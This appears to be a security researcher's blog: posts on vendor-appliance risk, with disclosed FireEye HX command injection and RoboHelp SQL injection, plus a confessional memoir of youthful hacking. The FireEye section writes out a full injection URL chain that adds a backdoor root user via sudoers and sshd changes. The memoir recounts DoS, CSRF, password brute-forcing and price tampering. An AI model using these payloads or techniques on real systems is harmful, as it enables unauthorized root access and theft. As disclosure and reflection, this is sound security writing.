Because a unique email makes it difficult for an attacker to brute force my account in much the same way a password does, and because it has the added benefit of making it difficult to target or identify me, I think it's just as important, if not more so, than having a uniquely strong password.  It's a form of security by obscurity.  Again, both are recommended, but I think unique and complex usernames should be a standard, something I rarely see today.  Security is all about layering, and although I know security by obscurity isn't a solution on its own, it's yet another layer to strengthen your posture if used properly.

As always, I encourage a discussion and healthy debate on the topic.  Please let me know why you do or don't agree!  I do these blogs to help the community but also to advance my own understanding by hearing from you knowledgeable readers!  Thanks so much!

- Curtis Brazzell

April 29, 2019

Real Trojan Horses - A Case for Independently Testing Third Party Appliances


Would you plug a device into your DMZ or trusted server VLAN that someone handed you without looking at it first?  That is the very definition of a rogue device, after all.  You probably want to have some control over, or at least visibility into, the device so you know whether its operating system and software packages are patched, as part of your patch management program.  Before you answer no, take a step back.  It's possible you've already done this within your corporate network, and in your home network too.

We put a lot of faith in our vendors, especially ones that are supposed to help keep us more secure.  These third-party appliances and software are typically closed-source and proprietary.  You're probably thinking, "Well, I include the private IP address in scope for my recurring vulnerability scans, so I'm good, right?"  I would commend you for doing this, but looking at these devices and software (without source) from this perspective is the equivalent of doing an external scan.  You're only seeing vulnerabilities in the exposed services or front-end code, not the underlying operating system or software packages that may be unpatched, misconfigured, and so on.

Maybe now you're thinking, "Well, I can trust security vendors because they know better, right?"  (thought no one, ever)  Unfortunately, in my experience the answer is no, and I'll share some examples below.  Security appliances such as firewalls and Intrusion Detection Systems have made simple security mistakes that may shock you, or not.  Just take the recent Cisco ASA default backdoor credentials as an example.  These vendors should know better!  That being said, we don't all practice what we preach, and this may be an opportunity for even us security professionals to take a look at our own processes and baseline standards.  A lot of penetration testing firms deploy physical devices or virtual machines that allow them to do remote testing, but without a plan to update or remove these when not in use, they can become outdated and pose a new threat to the very organization they're trying to help protect.

Hardware appliances are especially concerning because what you see from your own network is the "outside" perimeter of the device, and it's usually locked down to prevent customers from getting direct access to the underlying system.  It's a little like seeing the tip of the iceberg and hoping the mass below the water won't sink your ship.  Otherwise you might have a Titanic issue on your hands… 😬

"Iceberg, Straight Ahead!"


The following are some of my experiences.  This is by no means a complete list, as we constantly come across issues during penetration testing exercises.  These are just a few notable examples from my personal experience; they're a few years old now, but I feel they make my point.

Security Appliances
  • FireEye HX
A few years back I was tasked with implementing and administering a (then Mandiant) FireEye security appliance, their HX product.  The 2U rack server was packaged up nicely, and a web interface allowed for the provisioning and administration of the device on the customer's network.  CentOS was the underlying operating system, but you had to leverage FireEye's support service if there was a need to SSH into it for any reason, which they would do through a screen share.

I could understand this at the time; their "bread and butter" was the Indicators of Compromise (IOC) threat intelligence rules that would download and live physically on the filesystem, as well as the PHP code which made up the user interface and background scripts.

I got the system up and running, and a Qualys network vulnerability scan came back relatively clean.  As I began poking around on the system, specifically in the "Tools" section, I noticed there were "Ping" and "Trace Route" features.  You could specify an IP and see the output of the tool in the web browser.  Neat!  Well, not so fast… I quickly realized command injection was possible after specifying a simple semicolon, which resulted in an XML parsing error with the command's standard output at the bottom!
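For anyone wondering why a lone semicolon is all it takes, here's a minimal sketch of the vulnerable pattern versus a safer one.  This is illustrative Python, not FireEye's actual PHP, and the function names are mine:

```python
import ipaddress

def build_ping_unsafe(target):
    """DON'T: the target is spliced into a shell command string, so input
    like 'localhost; useradd evil' becomes two commands the moment
    /bin/sh parses it (e.g. via os.system or shell=True)."""
    return "ping -c 1 " + target

def build_ping_safe(target):
    """Validate the input as an IP address, then pass it as a discrete
    argv element (e.g. to subprocess.run with shell=False) so no shell
    ever gets a chance to interpret metacharacters."""
    ipaddress.ip_address(target)  # raises ValueError on anything else
    return ["ping", "-c", "1", target]
```

The fix is two layers: strict input validation, and never letting a shell parse user-supplied strings in the first place.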


Naturally, the web service was running as root.  You heard that correctly: a security vendor was running the Apache web service as root.  I can't even…

This is when I finally got the opportunity to poke my head under the water and take a look at the rest of that iceberg.  With a series of commands, I was able to create an SSH user with sudoers rights:

https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; useradd -m -p PASSWORD USER
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; cp /etc/ssh/sshd_config /etc/ssh/sshd_configBACKUP
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; echo "AllowUsers USER" >> /etc/ssh/sshd_config
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; cp /etc/sudoers /etc/sudoersBACKUP
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; echo "USER ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
https://[HX_APPLIANCE]:3443/script/NEI_ModuleDispatch.php?module=NEI_Network&function=HapiSysCommand&cmd=1&data=~|~|localhost,; service sshd restart
Nice!  I now had root access directly on the appliance.  From here I could access all sorts of information I probably wasn't supposed to see, such as IOCs, source code, and default passwords.

Mandiant IOC CVE

So now that we can see the whole "berg", what's under the hood in terms of vulnerabilities?  Surely FireEye keeps the OS and third-party applications patched on a regular basis and practices good secure coding!  (This is a joke; remember the "root" web service account?)  To be fair, the NEI hardware vendor may be partially to blame.

I then configured the vulnerability scanner to use the SSH credentials with sudo rights and targeted the machine again.  This time, a ridiculous number of service configuration issues, OS and third-party patching issues, and a handful of other vulnerabilities lit up the report with Critical, High, and Medium severities that weren't visible before authenticating.  I'm working on getting an image of the report for specifics and will update this blog when I do, but I no longer have that information readily available since it's been a few years now.

I then found the source code for the security web application and saw that it was written in PHP.  I ran RIPS, a static source code analysis tool, against it to identify even more vulnerabilities hidden beneath the surface.  I already knew they were using bad practices around command execution, having found multiple examples of injection manually by this point, so I wasn't surprised RIPS found even more.

RIPS PHP Code Analysis Report

I don't think they wanted to exclude any vulnerabilities in the OWASP Top Ten.  Again, this is security software written by one of the largest security vendors in the world.  🙄

As you can imagine, if an attacker exploited any of these vulnerabilities as I did, they could use the appliance as a pivot point in a larger attack, moving laterally and eventually compromising the entire network.  Because of the nature of this device, they could render the detection agents useless and effectively deploy malware to every endpoint while escaping detection.  No bueno!

The client I was working for is someone I admire in the cybersecurity community, and they had issues with this appliance sitting on their network in the state it was in.  We contacted Mandiant and reported the issue, but nothing really came of it.  I was later told it likely fell through the cracks due to the acquisition.  Fast forward a couple of years, when they're FireEye and no longer Mandiant, and another researcher found the same initial flaw I did and went straight to the media with it.  It gathered a lot of attention because FireEye had no bug bounty program and the researcher was essentially blackmailing them by withholding other vulnerabilities.

I work for a very reputable security company, and we collectively decided the right thing to do was to responsibly disclose the findings (a second time) to the new FireEye executive team.  They were thankful for the findings and handled the situation well, even rewarding me with CVEs for a few of the findings that hadn't previously been reported.

Third Party Software
  • Adobe RoboHelp Server
Here's another example of how third-party software or hardware can introduce vulnerabilities into your network.  I was doing a penetration test for a client whom I admire for really being on top of their patch management program.  They do a superb job of patching not just operating systems but third-party applications in both Windows and Linux environments, which is such a beautiful thing to see.  In fact, their vulnerability assessments are essentially squeaky clean, except for the unavoidable occasional new vulnerability that comes out between patch cycles.

This is also a client we've tested quarterly for a couple of years now.  As a penetration tester I was happy for them, but I was frustrated by how difficult it was to find an exploitable vulnerability I could leverage from the outside to gain internal access to their environment.  I decided my time would be best spent thinking outside the box and really fuzzing the external services that were available, specifically the web services.

One of these web services was an application called Adobe RoboHelp.  I hadn't heard of it, so I started poking around and diving deep into the logic.  I manually altered parameters and used Burp Suite to actively and passively test the responses until, finally, I found unauthenticated SQL injection.  This was an externally facing web service, and most RoboHelp instances are, because their purpose is to offer support and how-to articles to end users who visit the site.

Needless to say, with SQL injection there's an opportunity to access sensitive data and even potentially execute arbitrary code on the OS.  Because of this critical issue introduced by a trusted third party, an otherwise secure environment was now vulnerable to a breach.  I contacted Adobe's response team, who were a pleasure to work with as they created a patch for the issue.  They also awarded me a CVE!  I then communicated with my client to make sure they were aware of the patch, and tested again to ensure the issue was properly mitigated.
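For readers newer to AppSec, here's a minimal sketch of why SQL injection works and how parameterized queries shut it down.  This is generic illustrative code (SQLite, table and function names are mine), not RoboHelp's actual query:

```python
import sqlite3

def find_titles_unsafe(conn, topic):
    """DON'T: a value like "x' OR '1'='1" closes the string literal and
    rewrites the query, returning every row (or worse, via UNION/stacked
    queries on other databases)."""
    query = "SELECT title FROM articles WHERE topic = '" + topic + "'"
    return [row[0] for row in conn.execute(query)]

def find_titles_safe(conn, topic):
    """The driver binds the value as data; it can never be parsed as SQL."""
    query = "SELECT title FROM articles WHERE topic = ?"
    return [row[0] for row in conn.execute(query, (topic,))]
```

The injected input isn't "hacking the database" so much as being promoted from data to code, which is exactly what parameter binding prevents.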


In the past as a penetration tester I naturally gravitated toward custom-developed applications, assuming the road less traveled was where I would find my exploitable bugs.  As a systems administrator, I assumed a well-known vendor's product, especially a cybersecurity one, would be safe to trust.  I assumed their products had gone through rounds of testing and that they followed best practices when developing code.  These two incidents, in addition to a handful of others, have really swayed my thought process from both blue team and red team perspectives.

The threat of insecure devices on our networks is greater than ever due to the rise of IoT devices, which are popular in both consumer and enterprise environments.  Just type "Internet of Things security" into Google for countless examples of devices left open to the Internet with default credentials or other major holes that give attackers a foothold.  The lack of IoT security and the prevalence of infected devices is why I created Digifense all those years ago, although I no longer maintain it.

My advice to my readers is simple: as a customer or potential customer, challenge your vendors to share the results of their security tests.  Make sure the testing was performed recently and regularly, and by a third party.  Are they patching their products and dependencies regularly?  I also encourage all of you to independently test each new device and application prior to placing it on your network, as you would with any untrusted introduction to your environment.  And yes, vendors should earn your trust through a history of good practices.

If you have an internal security team, what better way to build skills and safely practice testing than against a new product in an isolated VLAN?  If you're adding the newest smart gadget to your home, inspect the network traffic to see whether it's encrypted and who or where it's phoning home to.  I do this with an OpenWRT router and tshark, and you can also use a tool like IoT Inspector.  Consider putting IoT gadgets in their own VLAN or on a guest WiFi network in case they get compromised.

Lastly, make sure your security vendors practice what they preach.  I wouldn't want to hire someone to protect me if they're not capable of protecting their own product or company.  Have they been involved in breaches?  See if the vendor has a reputation for bad security practices before you buy.  Are they the Titanic, promising to be un-sinkhackable?


My intent with this blog certainly isn't to use scare tactics or stir up paranoia, but to share my experiences and hopefully encourage you to challenge every device and application you deploy into your trusted environment.  Many providers do the right thing and "eat their own dog food", while others do not, or haven't always.  As security professionals we are trusted to keep the bad guys out, so the last thing we want is to unintentionally make the environment less secure by introducing a Trojan horse dressed up as the next security silver bullet.

If you liked this blog or you hate it with all of your soul, please let me know and why!  I would love to get feedback on what is and isn't valuable to my readers!

- Curtis Brazzell

April 21, 2019

From Grey to White - An Unspoken Ethical Journey in Cyber Security


I write this blog entry at the risk of tarnishing my personal and professional reputation.  I do so in hopes that it will help those who are starting out in this industry, or who are still in the grey zone, to know that this is likely a familiar path for a lot of us "professionals" in the space.  We don't speak of it, oftentimes because of the ethical oaths we've taken to obtain our professional certifications or positions in law enforcement.  It's also something I think we've put behind us, even though it's an important part of who we are.  While a black hat is something I never considered becoming, I'd be lying if I said I was always the white hat I am today.  Among the pillars of these professional certifications are "truth" and "honesty", so pretending my past was always without blemish and perfectly ethical would be a direct violation of that.

I want to tell my story because it's part of who I am, and I hope it encourages others who may be in this area of their lives to know that many of us (now) White Hats started out in much the same way.  Many of us have turned a passion into a career that is rewarding, but if we're honest with ourselves, we're still "hackers" at heart.

UPDATE : Ironically, as I finished writing this, current events around Marcus "MalwareTech" Hutchins have stirred a debate in the Cyber Security community on this very topic.

My Story

circa 1993

The year was 1993 and I was entering the 4th grade.  Our 14-person elementary class (93 students in the entire school) was lucky enough to receive a grant allowing us to take home our very own personal computers.  Mine was an original Macintosh (old even by then), which I quickly became obsessed with.  We eventually upgraded to newer models.  All of the students and their families met after school one evening and were taught how to plug everything in so we'd know what to do when we got home.  We also had external dial-up modems we could use for faxing and "electronic mail".  I took it upon myself to memorize every cord and every physical component of the machine.  I think I took some pride in knowing just as much as the adults in the room, since we were all new to this.  I can thank this very moment for setting everything in motion for my career today; that same drive and passion fuels me even now.

"Former Indiana School Superintendent H. Dean Evans helped formulate the Buddy project during his eight-year tenure that began in 1985.  Evans said his original hope was to have a computer in the home of every child from kindergarten through high school.  He sees a time when elementary school children will use computers as spontaneously as they now use pencils and crayons."  Thanks, Mr Evans!  We'll throw modern phones in as computers too and.. what are pencils?


Fast forward to 1996.  The movie "Hackers" had come out within the last year, but I wouldn't end up watching it for another decade or so.  I was eleven years old and I loved my Mac, but I felt like I had done just about everything I could imagine on the thing.  I was itching for more.  My dad was awesome enough to recognize my drive, and he had the foresight to see the coming technology boom, so he bought the family a Compaq Presario PC with Windows 95 and America Online on it.  Don't forget Encarta!  Now we were cooking with gas!

Our $2,500-ish 233MHz PC

Needless to say, for the next few years I became completely obsessed with this machine and everything it had to offer.  I was "viewing source" on websites I admired and memorizing HTML to build my own web pages.  Like everyone else at the time I was heads-down in IRC and AOL Instant Messenger (AIM), and I was playing video games like Duke Nukem 3D, Doom, Flight Simulator 95, Jedi Knight: Dark Forces, and others.  I learned how to create "hacks" for Jedi Knight DF2 and would have fun playing multiplayer games with those advantages.  I also created a player editor for that game in Visual Basic.  As I started to program I enjoyed making my own RPG games, and I was just getting into building my own computers from extra parts.  Search engines were pretty terrible at this point, so I was self-taught, mostly because I would break the computer every possible way and, afraid of getting in trouble with my dad, would have to fix it myself.  I did end up making my own meta-search engine to combine results from the greats (AltaVista, Ask Jeeves, Lycos, Yahoo, etc.).  This was back when results were less about reliability and more about quantity.

I learned a lot about file systems, registry settings, partitions, how to format and restore an OS, drivers, you name it.  It's embarrassing to admit now, but I used to lie awake at night staring at the LEDs on my desktop, hoping I could absorb some of its knowledge through osmosis or something… I would fantasize about being on a competitive panel of "experts" one day, able to answer every computer question thrown out.  Other kids were busy being eleven-year-olds.

I'll try to move along; my nostalgia isn't going to rub off on those of you who are surely getting bored by now, unless you can relate to this era.  I know many got started much earlier, or even later, in their careers, so let's jump forward to 1998, when "security" became my new obsession.


A little backstory: I grew up in a small farm town where most of my peers were into agriculture, and I was the lone one into technology.  I actually somehow managed to get an "F" (my only F in high school) in agriculture class.  As people around me started to get into computers, our small town would often call and pay me to "fix" their computer problems, and I developed a reputation as the local help desk kid.  As a thirteen-year-old I pretty much knew the ins and outs of Windows 95 and, later, Windows 98.  Looking back, it seemed everything was a driver or hardware issue!  I spent most of my days on the computer, so much so that I'd often forget to eat meals, and my parents would eventually "ground" me from it so I'd be forced to leave the house and socialize with other kids.  Again, shout out to my parents, or I may have wound up so introverted I couldn't communicate the way I can today with both technical and non-technical peers.

One day my dad was complaining about an annoying new policy at work: if he didn't move his mouse for a while, the screen would "require him to log in again".  I realized this was a lockout policy and existed for security reasons, but I was determined to help him get around it.  Windows 98 had something called Active Desktop, which let HTML web pages be used as a desktop wallpaper background.  My idea was to create an iframe or some JavaScript that would refresh on a certain interval to make it look as if the computer was actively in use, preventing the lockout from occurring.  My dad thought this was the greatest, though ironically it goes against the very advice I give now as a security consultant.

Anyway, the real reason we're visiting 1998: crashme.com was now a thing, and I heard about it from the other kids in my junior high who had computers.  There was a pretty small group of us, and we were super nerdy, as you can imagine.  This was a site which contained some Windows 95 and Windows 98 Denial of Service (DoS) vulnerabilities that would crash the OS regardless of which browser you were using (choose between Netscape Navigator or Internet Explorer, yay!).  When I say "crash", I mean your PC instantly got the infamous "Blue Screen of Death" (BSOD) simply by visiting the site, and the only way out was to flick the I/O switch and physically power off your PC.

As soon as my speedy 28.8kbps modem rendered the site, my face lit up with awe and excitement as my new blue wallpaper greeted me.  How in the world was this working?!  How could I bottle this up and re-use it?  I couldn't "view source", because by the time I got to the site my PC would crash.  Then I had an idea: I'd grab the contents of the site from my "Temporary Internet Files" directory, which cached it locally.  Success!  I could now see what the code was trying to do.  This exploit pre-dated Common Vulnerabilities and Exposures (CVE) identifiers, so it was simply known as the c:\con\con or "con con" vulnerability.

crashme.com code, thanks to the Wayback Machine!

For those that aren't familiar, Ars Technica describes it well.  "The Windows 9x-era bug was due to an error in the way that operating systems handled special filenames. Windows has a number of filenames that are "special" because they don't correspond to any actual file; instead, they represent hardware devices. These special filenames can be accessed from any location in the file system, even though they don't exist on-disk.

While any of these special filenames would have worked, the most common one used to crash old Windows machines was con, a special filename that represents the physical console: the keyboard (for input) and the screen (for output). Windows correctly handled simple attempts to access the con device, but if a filename included two references to the special device—for example, c:\con\con—then Windows would crash. If that file was referenced from a webpage, for example, by trying to load an image from file:///c:/con/con then the machine would crash whenever the malicious page was accessed."

Remember, too, that this was 1998 and people didn't patch Windows like they do (or don't do) today, so almost everyone stayed vulnerable for several years.  It's about this time in my life that I step into the fitting room known as my bedroom and try on the super alluring grey hat.


Around this time my best friend, who, you guessed it, was one of my computer buddies in junior high, was really into a virtual chat environment.  He played this thing all the time and took it super seriously.  You know, like how people are into World of Warcraft.  Is that what kids are into nowadays?  Did I mention I'm old?  Anyway, he talked me into joining, and I realized there were tons of people on this thing and that it allowed unfiltered HTML in the public and private chat rooms.  I think you know where this is going…

I realized I could "weaponize" this code with a simple image tag in a chat room, and I'd watch people drop like flies from the channels.  I could also DM people directly and target them individually.  I got a super sick rush from this and thought it was pretty much the coolest thing in the universe at the time.  I didn't think about how I was potentially making people lose their unsaved work; I just figured it was pretty harmless since it shouldn't damage any equipment.

This led me down another path, since I realized HTML could be rendered in direct messages.  I thought, "What happens if I create some JavaScript that causes a recipient to make a call to a resource I don't have access to?"  For example, could I send a message to someone which then caused them to message someone else?  This was the beginning of an obsession with Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), before I knew they had names.  I realized through trial and error that for another URL to be called successfully it had to be URL encoded, though I didn't know the term at the time.  I just knew certain characters wouldn't work in my payload unless they were "converted" (encoded) to a hex equivalent.  I ended up making my own URL encoder tool, and pretty soon I was terrorizing the virtual town.
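My homemade encoder probably looked something like this (a reconstruction in Python; the original tool is long gone).  It percent-encodes any character that isn't safe to place in a URL:

```python
def url_encode(text, safe="-_.~"):
    """Percent-encode anything that isn't an unreserved URL character."""
    out = []
    for ch in text:
        if ch.isalnum() or ch in safe:
            out.append(ch)
        else:
            # Convert each byte to its hex equivalent, e.g. ' ' -> %20
            out.extend("%{:02X}".format(b) for b in ch.encode("utf-8"))
    return "".join(out)

print(url_encode("alert('hi')"))  # alert%28%27hi%27%29
```

These days Python's standard library does the same job with `urllib.parse.quote`, but back then rolling your own was half the fun.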

I created payloads that would use CSRF against privileged moderators in the channels; the payloads would cause them to delete other users' virtual houses or give me virtual currency in the game.  I tested one of my attacks against my good friend; it was designed to message an Operator from his account, cursing them out and taunting them to ban him.  I thought this was so cool and couldn't wait to hear from my friend whether it worked (my only way to verify the attack), until he called me up, understandably upset.  I had forgotten how important this game was to him, and I had just gotten him banned for life under his account.  He rightfully didn't talk to me for a month or so afterwards.  Let this be lesson one for me going down the "dark side" of Information Security: it wasn't as cool for the victims as I thought it was for me at the time.

I then decided to get out of CyberTown and give up being a nuisance.  I friended a stranger in a chat and told him about my "abilities," which he was very interested in.  I shared my payloads with him (another bad idea) and went on my way.  I later saw in the news (on CyberTown's own site) that someone was going to be prosecuted for "hacking" CyberTown, and based on the description of the attacks I couldn't help but wonder if it was the same guy.  A close call?  I remember times when the doorbell would ring and I'd be afraid the FBI was at the door, no joke.

Trouble at School #1

Back in the day, emails with embedded HTML just rendered fully in the client by default.  As a time reference, the ILOVEYOU worm was all over the media about now.  I'm now a freshman in high school, and we had our very own network administrator.  She was a kind lady, but I saw her as a technical opponent at the time for whatever reason.  I guess being a teenager I was just stupid and thought I needed to demonstrate just how much smarter I thought I was than her.  I was known as one of the "nice kids" who never saw the principal's office and never got into trouble or drew attention to myself.  I had the ill-conceived idea to generate an email that simply showed a green smiley face I created, with an embedded WAV file laughing maniacally (something to the tune of "MWUAHAHAHAHA..").  I figured this would be the last thing she saw before her computer blue-screened.

Being young and dumb, I crafted the email and modified my "sender" address to something made up so I wouldn't be recognized.  I looked it over and, without a second thought and only a smile, sent it on.  I got that same rush after it sent...  I knew when she opened it her computer would crash and she wouldn't know who sent it.

The next day I'm sitting in a humanities class when all of a sudden our lesson is interrupted by an office assistant.  She's holding a pink slip in her hand and my stomach suddenly felt queasy.  I knew at that moment she was there for me, and, sure enough she was.  As she announced my name, it's like every head in the class turned to look directly at me and I heard people whispering, "What did he do?".  

As I'm walking to the office all I can think about is how they caught me.  Were her skills superior to mine?  Did she have some advanced way of tracking down the origins of my image or email in some way?  Instead of feeling bad about the attack, I was focused on the technical.

The reality of the situation hit when I entered the office and saw the disappointed facial expression of the network administrator, the victim of my attack.  I instantly felt awful seeing a person on the other end of this instead of a recipient address.  Like my friend, I got the impression it wasn't just a "cool prank" to her either.  We went into her office, and she was unbelievably gracious to me.  She asked me why I did it, and I didn't have a good answer for her.  I told her I liked her.  She was nice enough to tell me to keep my voice down so the principal didn't hear us; she was trying to protect me!  She said something like, "Look, I know you can probably do circles around me on a computer, but you should put your skills to good use instead of bad.  Also, my computer froze when I opened your email and I was afraid to turn it off, so it laughed loudly all night.  My husband and I didn't get any sleep.  Do I have a virus?"  To which I replied, "Oh no, nothing like that.  It's just a harmless prank that forces you to shut off your computer.  No damage should have been done to your files, and I didn't expect it to laugh like that on an endless loop... so... sorry about that!  Oh, by the way, how did you know it was me?"

She explained that my full name was simply at the bottom of the email body.  Are you kidding me?!?  I should have known that the email client I was using auto-inserted a signature with my full registered name (silly me), so even though I had taken the time to mask my sender address, it was all for nothing.  DOH!  Let this be lesson two!

Trouble at School #2

I think I'm a junior in high school at this point.  I've poked around at home on my Internet connection and discovered a POP mail server hosted by my school.  Because the email naming convention was simple, I generated a quick list of all the teachers' email addresses.  I didn't have their passwords, but I figured I could brute-force them over a POP3 connection quickly enough.  I used a tool called Brutus (et tu, Brute?) that would do exactly this, running a password wordlist against my list of user accounts.  I fired it up one night and went to bed.  When I woke up, I was shocked to see it had successfully cracked about 90% of the passwords!  I didn't expect this, but I soon saw that a majority of the credentials were still the original default of "hawks".  Our mascot was "The Blackhawks", so...  Anyways, I recall funny ones too, like the biology teacher's being "froggy" and the math teacher's being "median" or something silly.  No one used caps, numbers, special characters, or a length over 6 or 7 characters.

I really didn't expect this to be successful.  I didn't think I'd get anyone's password, let alone nearly all of them.  My first thought was: I need to do the right thing this time around and report this.  But first... I need to look at a couple of inboxes.  You know, to make sure they're, uh... legitimate?  So I looked at my math teacher's email and bragged about it the next day.  I tried my hardest to resist the temptation to look at anyone else's.  It felt wrong, but I got that same thrill of gaining unauthorized access from the comfort of my home PC.  I stored the plaintext usernames and passwords in a text file named something obvious like "My_Teachers_Weak_Passwords.txt" and kept it where I stored everything at that time: my Angelfire web directory!  I didn't want to lose what I had, so I figured that was as good a place as any!  It had directory indexing enabled, so I could easily see all of my files from anywhere if I needed them.  (Pre-cloud, same concept.)

At some point I was contacted on my Angelfire email account by an educator at another school, saying they had somehow come across my file and encouraging me (it felt like a threat) to take it down and self-report the incident.  I explained that I had planned to, but conveniently left out the part about the account access.  Anyways, I went about it completely the wrong way by just walking into the principal's office one day and saying something like, "You all should change your passwords, because they're terrible."  For some reason they didn't respond well to this.  😲  In my mind I was self-reporting and doing the right thing, but I failed to see how much this freaked them out at the time.

They didn't know what to do with me; I was their first "hacking" case.  They wanted to make an example of me, but they also had a difficult time understanding the scope of what had been done.  They ended up suspending me for a day and requiring me to see a therapist, because they had decided after the first incident that I had an "irresistible urge to hack".  Long story short, I went; the therapist was confused as to why I was there, diagnosed me with A.D.D., and sent me on my way.

Trouble at School #3 & #4

I won't waste a lot of time explaining these.  Basically, at this point I had a reputation among the faculty and the other students.  The nickname friends called me was "Hack".  I didn't like it, but it wasn't meant as an insult either.  My first computer class was a web design class in 2000, run by the PE teacher, who used a Web Development for Dummies book as the curriculum.  No joke!  It was hard to sit through with my experience, so I cloned a fake Ask Jeeves search engine portal (I was just beginning to be a Google fan) and made it respond with a silly answer no matter what you asked it.  Kind of like what Ask Jeeves did by default, now that I think about it!  My friends and I would call the teacher over, ask why our search wasn't working, and get a laugh out of how dumbfounded he was by the whole thing.  Yeah, I was that annoying brat kid when it came to computers.  Anyway, there were two additional incidents that got me sent back to the office.  One time was innocent: I was troubleshooting a DNS issue locally, and when the teacher saw the Windows Command Prompt open he instantly thought of the Hollywood movies and deduced I had to be hacking again.  I explained myself to the office staff, but by then I was the boy who had cried wolf, and no one believed me.

The second time, in this same class, I realized my workstation was still logged in as an Administrator, so I used my new privileges to install a game (Jedi Knight: Dark Forces II) on the network share so my friends and I could play multiplayer games instead of designing simple web pages.  I used up all of the free space on the drive, which I thought was allocated just for me... but instead it was for the entire school.  This accidentally caused a bit of a denial-of-service situation, and it eventually got back to me.  This was the final straw for the school, and I was banned from computer use for the rest of my high school career.  Little did they know, I was a library assistant, so in my free time at the library I would continue to scrape local credentials and install annoying prank-ware, like the one that makes your mouse jump all over the place or the screensaver that looks like a BSOD... those kinds of pranks.  They also had software at that time to "lock down" the computers, so I saw it as a personal challenge to bypass those restrictions, which I did.


I didn't get in trouble for anything in college, but I was far from ethical.  I would pirate software, and I learned how to use a debugger to reverse engineer (RE) the binaries to bypass the need for keys.  I didn't contribute any "cracks" to the community, but I enjoyed making them for my own use.  This skill actually came in handy later in my career when reverse engineering malware samples and creating buffer overflows.

I figured out in college how to hack my original Xbox with only software mods, which wasn't something I came up with on my own.  I followed some guides, but I did find a unique way of efficiently cloning new systems in a relatively short amount of time.  Getting everything the way I wanted it, with ROMs and cloned games, took me about a year; after that, I found I could replicate the entire process onto a new Xbox in under an hour.  Word got around somehow, and before I knew it I had a bit of an underground business.  Strangers would show up at my door, offer me some cash, and I'd spit out a hacked Xbox for them.  I never advertised; it was simply word of mouth.  This happened somewhat regularly for a while, and my roommates were used to it.  I eventually shut it down but continued to mod just about every console I owned afterwards.

Other Memorable Events

Before my career in Cyber Security, I did other things I was later not proud of.  I hacked into a few of my friends' AIM accounts and pretended to be them to other buddies, thinking it was funny.  When I turned 16 and had access to a laptop, I would war drive, which I didn't know was a thing at the time.  One time a buddy and I pulled up to his dad's business, sat in the parking lot, and I showed him how easy it was to access the internal shared folders, which contained sensitive documents.

I hacked all of my neighbors' WiFi passwords, especially the ones who had a default 2Wire gateway password of eleven numbers or who were using WEP.  I exploited SQL injection on an e-commerce site and looked around before reporting it anonymously.  I found logic flaws in Marriott's WiFi registration pages, which took pricing information from the client side, so it was trivial to make the cost $0.00.  I also lived across from a Marriott in an apartment, so with a Pringles cantenna and this trick I was set.  Similarly, another e-commerce site did this for product pricing, so I actually ordered something and made it cost a dollar, only to feel guilt-stricken and cancel the order before it went through.  That was the first time it actually felt like I was going too far; my conscience wouldn't allow it.  However, I did exploit a Flash-based "game" on a local car wash's website and created a script to win a free deluxe wash on demand.  I used this many times before it really hit me that what I was doing was also theft, and then I gave it up.
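The common thread in those pricing flaws is a server that trusts a price supplied by the client.  A minimal sketch of the vulnerable pattern versus the fix (item names and prices are hypothetical, not the actual systems involved):

```python
# Hypothetical server-side catalog; in a real app this comes from a database.
CATALOG = {"wifi_day_pass": 12.95, "deluxe_wash": 14.00}

def charge_insecure(item, client_price):
    # Vulnerable pattern: the client-submitted price is used as-is,
    # so a tampered request can set it to 0.00 (or 1.00).
    return client_price

def charge_secure(item, client_price=None):
    # Fixed pattern: the authoritative price is looked up server-side;
    # anything the client sends is ignored.
    return CATALOG[item]

print(charge_insecure("wifi_day_pass", 0.00))  # 0.0
print(charge_secure("wifi_day_pass", 0.00))    # 12.95
```

The fix is the same whether the price rides in a hidden form field, a cookie, or a Flash variable: never let the client dictate what it owes.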

Lastly, whenever I'd go somewhere that had a public terminal that was "locked down", I'd try all of the techniques I learned to try to escape the restrictions.  I did this at hotels, lobbies, anywhere there was public access.

Lessons Learned

At that early time in my life, in high school, I looked at those events differently.  I viewed myself as a victim: because of the school administration's ignorance of technology, my "harmless snooping" was unjustly being made an example of.  I hadn't taken anything down, destroyed property, or stolen anything; I argued that my unauthorized access was the equivalent of walking into the school after hours and simply looking around.  I had a bad attitude about this event for years and even convinced friends and family, along with myself, that the school simply didn't understand.

Let me be clear: I WAS WRONG

I did things without approval.  I created a situation in which people, even friends, no longer trusted me.  I scared the school administration, and because this was new to them and they didn't have an "expert" on staff to help them handle the new risk I posed, they didn't know how to move forward.  They knew what I had done was wrong, and they rightly wanted to prevent it from happening in the future.  Maybe the next person wouldn't simply view records, but would change grades or bring down the network.

Looking back now, I would have received greater satisfaction by responsibly asking for permission and testing their deficiencies in order to report them, as I do today as part of my daily job responsibilities.  The rush of doing something I shouldn't, and the fear of being caught that follows, is nothing compared to the joy I get from legally testing environments and effectively communicating risk to customers to help them strengthen their defenses.

I genuinely wanted the school to set up better passwords, but scaring them into doing so and violating their trust by accessing accounts I shouldn't have was not the right approach.  

Because of these events, I now have a blemish on a record I'm otherwise proud of.  I take great pride in the quality of work I provide to clients and in the ethical White Hat road I've stuck to since starting a career in Cyber Security ten years ago.  Don't get me wrong, there are times when I still really want to stick a single quote or an alert(1) in an input field on a site I'm not authorized to test, but I do my best to resist the temptation.

As ridiculous as the idea of therapy for a hacking addiction seems to me, there is a certain truth to the obsession and the difficulty of denying the temptation to test.  I can almost see how someone could become a black hat and internally justify their own actions.  Hacking may seem like a victimless crime, because you can't physically see or get to know the person on the other end of the wire.

